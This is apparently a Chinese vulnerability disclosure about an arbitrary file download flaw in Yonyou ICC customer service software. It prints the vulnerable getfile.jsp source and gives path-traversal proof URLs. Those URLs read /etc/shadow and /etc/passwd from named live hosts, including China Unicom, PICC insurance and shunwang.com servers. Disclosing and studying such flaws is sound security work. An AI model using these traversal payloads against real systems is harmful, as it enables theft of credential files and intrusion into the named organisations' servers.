用友ICC客服系统任意文件下载漏洞影响联通人寿等

### 简要描述： 任意文件下载 ### 详细说明： ``` 用友icc客户系统存在任意文件下载漏洞，漏洞文件common/getfile.jsp源码如下： <%@ page contentType="text/html;charset=UTF-8" %> <%@ page import="java.io.*,com.ufida.icc.util.*,java.util.*" %><% String fullPath = ""; String f=""; f = request.getParameter("p"); if(CommonUtil.validateParam(f)){ f = ""; } f = CommonUtil.filtParam(f); if(f == null || f.equals("")){ out.print("请传入文件名。 "); return; } f = f.substring(f.lastIndexOf("/")+1); String extName = f.substring(f.lastIndexOf(".")+1); if(extName.equals(f)){ out.print("请传入正确的文件名,带后缀 "); return; } String basePath = null; String baseUrl = null; baseUrl = SystemProperties.instance().webBaseUrl; basePath = SystemProperties.instance().webUploadPath; fullPath = basePath + f; fullPath = fullPath.replace("\\","/"); String fullPathFileName = fullPath.substring(fullPath.lastIndexOf("/")+1); String fullPathFile = fullPath.replace(fullPathFileName,""); File fileLoad = new File(fullPathFile, fullPathFileName); if(fileLoad.exists()){ OutputStream outp = null; FileInputStream in = null; String typeName = "application/octet-stream"; try{ outp= response.getOutputStream(); byte b[] = new byte[1024]; response.setHeader("Content-disposition", "attachment;filename=" + fullPathFileName); response.setContentType(typeName); long fileLength = fileLoad.length(); String length = String.valueOf(fileLength); response.setHeader("Content-Length", length); in = new FileInputStream(fileLoad); int n = 0; while ((n = in.read(b)) != -1) { outp.write(b, 0, n); } outp.flush(); }catch(Exception e){ out.println("下载失败：" + e.getMessage()); }finally{ if(in != null){ in.close(); in = null; } if(outp != null){ outp.close(); outp = null; out.clear(); out = pageContext.pushBody(); } } }else{ out.print("文件"+fullPathFileName+"不存在。 "); } %> ``` ### 漏洞证明： ``` 案例： http://111.75.198.122/web/icc/chat/chat?c=1&s=1 ``` [<img src="https://images.seebug.org/upload/201501/092348597443a37846db3ebe924876266a1a018c.png" alt="0.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/092348597443a37846db3ebe924876266a1a018c.png) ``` http://111.75.198.122/web/common/getfile.jsp?p=..\\..\\..\\..\\etc\\shadow ``` [<img src="https://images.seebug.org/upload/201501/092349498f18be3751454e1c2f294b969766ae0d.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/092349498f18be3751454e1c2f294b969766ae0d.png) ``` 其他案例： 中国联通在线导购客服 http://help.10010.com/web/common/getfile.jsp?p=..\\..\\..\\..\\etc\\passwd 中国联通客服 http://webservice.10010.com/web/common/getfile.jsp?p=..\\..\\..\\..\\etc\\shadow 人寿保险客服 http://im.e-picc.com.cn/web/common/getfile.jsp?p=..\\..\\..\\..\\etc\\shadow 网维游戏客服 http://icc.shunwang.com/web/common/getfile.jsp?p=..\\..\\..\\..\\etc\\shadow ```